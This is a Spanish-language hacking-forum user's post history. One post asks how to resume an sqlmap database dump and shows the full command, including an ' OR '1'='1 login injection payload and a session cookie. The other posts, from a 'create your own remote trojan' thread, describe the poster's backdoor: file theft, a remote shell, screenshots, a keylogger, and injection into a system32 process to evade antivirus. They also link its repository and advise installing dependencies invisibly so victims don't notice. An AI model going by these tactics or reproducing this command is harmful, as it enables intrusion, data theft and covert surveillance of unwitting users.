elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Nivel Web / [SQLMAP] Reanudar consulta con session.sqlite en: 11 Agosto 2023, 18:35 pm
Hola todos,

No utilizaba sqlmap hace tiempo y hoy vulevo a utilizarlo pero tuve un inconveniente. Deje mi computadora encendida obteniendo el dump en un SO nuevo que estoy probando (ElementaryOS) y cuando la volvi a ver estaba todo cerrado, no entiendo que paso.

En fin, al ejecutar nuevamente el comando en vez de cargar todo en automatico comenzo desde 0, los archivos de session aun estan en su carpeta correspondiente, session.sqlite tiene todos los datos de antes de comenzar la ultima consulta en la que se cerraron los programas, utilice el target.txt e igual comienza desde 0. Ya no se que comandos probar, alguien sabe como reanudar la sesion? Son muchos datos y no quisiera esperar otros 2 dias jaja

Comandos utilizados:
python3 sqlmap.py -s /home/admin/sqlmap/session.sqlite
Devuelve error de sintaxys

python3 sqlmap.py -u "https://www.localhost.ovh/login.php" --data "username=x@test.com&password=' OR '1' = '1" --cookie "PHPSESSID=uf6mr4mbes04ra7itsoddp7q3k" -s "/home/admin/.local/share/sqlmap/output/www.localhost.ovh/session.sqlite" -D database -T table --dump

Con este comando comienza todo desde 0, igualmente si pongo el -s al final

Gracias, espero sus respeustas saludos.
2  Seguridad Informática / Análisis y Diseño de Malware / Re: crear troyano remoto propio en: 7 Febrero 2022, 23:00 pm
Cuantas más dependencias tengas, más infectados estás perdiendo....  :-\ Allá tú pero yo miraría otros lenguajes de programación que no exijan dependencias y que funcionen en todos los sistemas operativos Windows con  el menor de los requisitos. 

Mira a ver cuantos grandes virus están escritos en lenguajes interpretados  :xD

Es solo mi opinión, tampoco tiene que ser la correcta, es solo mi consejo.



jaja por que perderias infectados? ni cuenta se daran que estas instalando depenencias, aparte son muy livianas tampoco van a sospechar por tiempo ya que ellos estaran en su escritorio haciendo cosas mientras todo se instala en segundos en una terminal no visible para el usuario.
Pense hacerlo en c++ pero es lo mismo con mas lineas jaja, ruby pero habia problemas de compatibilidad, no se cual lenguaje suguieras para hacer esto pero python fue mi mejor opción, almenos para el propocito que fue para una red local en un ciber
3  Seguridad Informática / Análisis y Diseño de Malware / Re: crear troyano remoto propio en: 1 Febrero 2022, 22:56 pm
Está en base a python2 exactamente para poder infectar Windows, Windows 7 e inferiores no soportan python3 por eso está en python 2 así es compatible con cualquier sistema.
Y a lo que dices no tiene sentido, es obvio que tú lo vas a instalar si no lo detecta la computadora, ya escribí el virus te toca escribir la instalación automática de las dependencias.
Lo puedes hacer en un .exe que de fondo instalé python2 con los permisos de usuarios que dió la víctima al ejecutar el .exe
4  Seguridad Informática / Análisis y Diseño de Malware / Re: crear troyano remoto propio en: 27 Enero 2022, 11:33 am
Pues depende cual es tu OS objetivo, hice este para una red local hace unas semanas creo, si no mal recuerdo funciona con linux y windows, obviamente android al tener el kernel de linux.
Se puede adaptar para que funcione fuera de la red local usando sockets, por ahorita las unicas funciones que tiene y recuerdo son:
Robo y sembrado de cualquier archivo.
Utilizar shell del sistema
capturas de pantalla
transmisión en vivo de lo que hace la victima (Tomando muchas ss/s)
keylogger
y seria que lo revises para ver si tiene algo mas por que no me acuerdo jaja
Retomare el proyecto en 1 mes que tendre tiempo, si quieres siguelo y cuando lo retome te notificara que hay una actualización en el repositorio
https://github.com/SrMai/BackDoor.git

(en una de las primeras lineas hay un codigo como comentario, si lo descomentan lo que hace es que cuando se ejecuta por primera vez en un sistema windows, se inyecta al proceso de system32 así que se vuelve indetectable para el antivirus y auto ejecutable al encerder la computadora).
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines